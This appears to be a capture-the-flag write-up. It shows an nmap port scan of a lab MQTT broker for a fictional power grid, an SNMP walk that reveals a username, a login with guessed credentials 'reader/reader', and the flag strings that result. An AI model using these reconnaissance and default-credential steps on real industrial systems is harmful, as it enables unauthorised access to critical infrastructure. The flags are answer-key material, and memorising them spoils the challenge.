Sensor Array
🧠Challenge Text¶
Hi, emergency troubleshooter,
sensor data from the distribution network are being continuously transmitted to broker.powergrid.tcc. However, the outsourced provider went bankrupt last week, and no one else has knowledge of how to access these data. Find out how to regain access to the sensor array data.
Stay grounded!
🎨 Solution¶
Lets start with scanning network for open ports
- TCP IPv4
$ nmap -p- broker.powergrid.tcc Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-07 22:49 CET Nmap scan report for broker.powergrid.tcc (10.99.25.50) Host is up (0.017s latency). Other addresses for broker.powergrid.tcc (not scanned): 2001:db8:7cc::25:50 Not shown: 65534 closed tcp ports (conn-refused) PORT STATE SERVICE 1883/tcp open mqtt - UDP IPv4
As we can see mqqt tcp port 1883 is open and udp port 161 with snmpv3 server. MQTT is standart messaging protocol for Internet of Things (IoT). To subscribe for all topics lets use mosquitto tool and run
$ sudo nmap -sU -p 53,123,161,500,1900 -sV broker.powergrid.tcc Other addresses for broker.powergrid.tcc (not scanned): 2001:db8:7cc::25:50 PORT STATE SERVICE VERSION 53/udp closed domain 123/udp closed ntp 161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public) 500/udp closed isakmp 1900/udp closed upnp Service Info: Host: Mosquitto
$ mosquitto_sub -h broker.powergrid.tcc -t "#"
Connection error: Connection Refused: not authorised.
Looks like we are unauthorized. Before brute forcing the user name and password it's worth to check SNMPv3 server.
$ snmpwalk -v1 -c public broker.powergrid.tcc
iso.3.6.1.2.1.1.1.0 = STRING: "MQTT broker for power grid sensors. Only reader has the rights to subscribe to a topic!"
iso.3.6.1.2.1.1.3.0 = Timeticks: (173529253) 20 days, 2:01:32.53
iso.3.6.1.2.1.1.5.0 = STRING: "Mosquitto"
iso.3.6.1.2.1.1.6.0 = STRING: "DC A, area 51"
iso.3.6.1.2.1.1.7.0 = INTEGER: 1
End of MIB
Gotcha, we found a user reader who has the rights to subscribe to a topic. Let's try simple login.
$ mosquitto_sub -h broker.powergrid.tcc -t "#" -u reader -P reader
TEST{1vX4-7hk7-a16H-pi45}
TEST{bvX2-B8k7-3b6H-MY8p}
FLAG{0hs0-SiJm-TO5B-46HD}